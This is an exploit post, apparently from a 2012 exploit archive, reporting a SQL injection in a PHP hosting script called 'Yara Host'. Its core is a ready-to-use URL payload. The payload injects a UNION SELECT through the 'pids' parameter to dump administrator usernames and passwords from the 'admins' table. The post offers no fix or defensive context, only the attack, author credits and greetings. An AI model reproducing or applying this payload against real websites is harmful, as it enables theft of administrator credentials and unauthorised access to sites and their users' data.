facebook facebook twitter rss

Yara Host SQL Injection

Author: xSecurity , Published: 24-12-2012
==============================================
# Exploit Title: Yara Host SQL Injection
# Author: xSecurity [Dr.KroOoZ]
# Software : http://www.traidnt.net/vb/traidnt2207687/
# Site Coder : http://islamne.com/
# Picture : http://store3.up-00.com/Nov12/ 40v35361.png
# Tested on: Windows
# Dork : -
==============================================
Bug In File : page.php

[+] Exploit :
http://localhost/scan/host/apages.php?ids=do&pids=1[SQL-Injection]

[+] Ex :
http://localhost/scan/host/apages.php?ids=do&pids=-1+union+select+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admins

==============================================
[+] Email : b0x@hotmail.com
==============================================
[+] Greet's : b0x | NoQRQR | N.K. |
[+] Website : sec4ever.com | exploit4arab.com
==============================================

Like us on Facebook :